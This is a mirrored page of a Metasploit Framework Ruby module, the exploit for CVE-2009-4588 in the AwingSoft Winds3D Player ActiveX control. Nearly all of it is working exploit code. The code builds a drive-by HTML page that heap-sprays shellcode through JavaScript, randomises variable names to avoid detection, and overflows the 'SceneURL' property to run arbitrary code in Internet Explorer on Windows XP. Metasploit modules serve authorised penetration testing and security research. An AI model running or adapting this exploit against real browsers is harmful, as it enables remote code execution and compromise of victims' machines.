Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/awingsoft_web3d_bof.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
##

7
# awingsoft_web3d_bof.rb

8
#

9
# AwingSoft Web3D Player 'SceneURL()' Buffer Overflow exploit for the Metasploit Framework

10
#

11
# Tested successfully on the following platforms:

12
#  - Internet Explorer 6, Windows XP SP2

13
#  - Internet Explorer 7, Windows XP SP3

14
#

15
# WindsPly.ocx versions tested:

16
#  - 3.0.0.5

17
#  - 3.5.0.0

18
#  - 3.6.0.0 (beta)

19
#

20
# Trancer

21
# http://www.rec-sec.com

22
##

23


24
class MetasploitModule < Msf::Exploit::Remote

25
  Rank = AverageRanking

26


27
  include Msf::Exploit::Remote::HttpServer::HTML

28


29
  def initialize(info = {})

30
    super(

31
      update_info(

32
        info,

33
        'Name' => 'AwingSoft Winds3D Player SceneURL Buffer Overflow',

34
        'Description' => %q{

35
          This module exploits a data segment buffer overflow within Winds3D Viewer of

36
          AwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of

37
          AwingSoft Web3D Player.

38
          By setting an overly long value to the 'SceneURL' property, an attacker can

39
          overrun a buffer and execute arbitrary code.

40
        },

41
        'License' => MSF_LICENSE,

42
        'Author' => [

43
          'shinnai <shinnai[at]autistici.org>',	# Original exploit [see References]

44
          'Trancer <mtrancer[at]gmail.com>',	# Metasploit implementation

45
          'jduck'

46
        ],

47
        'References' => [

48
          [ 'CVE', '2009-4588' ],

49
          [ 'OSVDB', '60017' ],

50
          [ 'EDB', '9116' ],

51
          [ 'URL', 'http://www.rec-sec.com/2009/07/28/awingsoft-web3d-buffer-overflow/' ]

52
        ],

53
        'DefaultOptions' => {

54
          'EXITFUNC' => 'process'

55
        },

56
        'Payload' => {

57
          'Space' => 1024,

58
          'BadChars' => "\x00\x09\x0a\x0d'\\",

59
          'StackAdjustment' => -3500

60
        },

61
        'Platform' => 'win',

62
        'Targets' => [

63
          # data segment size: 76180

64
          # crasher offsets: 2640, 2712, 8984, 68420, 68424

65
          [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C, 'Offset' => 8984 } ]

66
        ],

67
        'DisclosureDate' => '2009-07-10',

68
        'DefaultTarget' => 0,

69
        'Notes' => {

70
          'Reliability' => UNKNOWN_RELIABILITY,

71
          'Stability' => UNKNOWN_STABILITY,

72
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

73
        }

74
      )

75
    )

76
  end

77


78
  def on_request_uri(cli, request)

79
    # Re-generate the payload

80
    return if ((p = regenerate_payload(cli)) == nil)

81


82
    # Encode the shellcode

83
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

84


85
    # Setup exploit buffers

86
    nops = Rex::Text.to_unescape([target.ret].pack('V'))

87
    ret = Rex::Text.uri_encode([target.ret].pack('V'))

88
    blocksize = 0x40000

89
    fillto = 500

90
    offset = target['Offset']

91


92
    # Randomize the javascript variable names

93
    winds3d = rand_text_alpha(rand(100) + 1)

94
    j_shellcode = rand_text_alpha(rand(100) + 1)

95
    j_nops = rand_text_alpha(rand(100) + 1)

96
    j_ret = rand_text_alpha(rand(100) + 1)

97
    j_headersize = rand_text_alpha(rand(100) + 1)

98
    j_slackspace = rand_text_alpha(rand(100) + 1)

99
    j_fillblock = rand_text_alpha(rand(100) + 1)

100
    j_block = rand_text_alpha(rand(100) + 1)

101
    j_memory = rand_text_alpha(rand(100) + 1)

102
    j_counter = rand_text_alpha(rand(30) + 2)

103


104
    # we must leave the page, so we use http-equiv and javascript refresh methods

105
    html = %Q|<html>

106
<head><meta http-equiv="refresh" content="1;URL=#{get_resource}"></head>

107
<object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903' id='#{winds3d}'></object>

108
<script>

109
#{j_shellcode}=unescape('#{shellcode}');

110
#{j_nops}=unescape('#{nops}');

111
#{j_headersize}=20;

112
#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;

113
while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};

114
#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});

115
#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});

116
while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};

117
#{j_memory}=new Array();

118
for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};

119


120
var #{j_ret} = unescape('#{ret}');

121
while (#{j_ret}.length <= #{offset}) { #{j_ret} = #{j_ret} + unescape('#{ret}'); }

122
#{winds3d}.SceneURL = #{j_ret};

123
setTimeout('window.location = "#{get_resource}";', 500);

124
</script>

125
</html>

126
|

127


128
    print_status("Sending #{self.name}")

129


130
    # Transmit the response to the client

131
    send_response(cli, html, { 'Content-Type' => 'text/html' })

132


133
    # Handle the payload

134
    handler(cli)

135
  end

136
end

137


138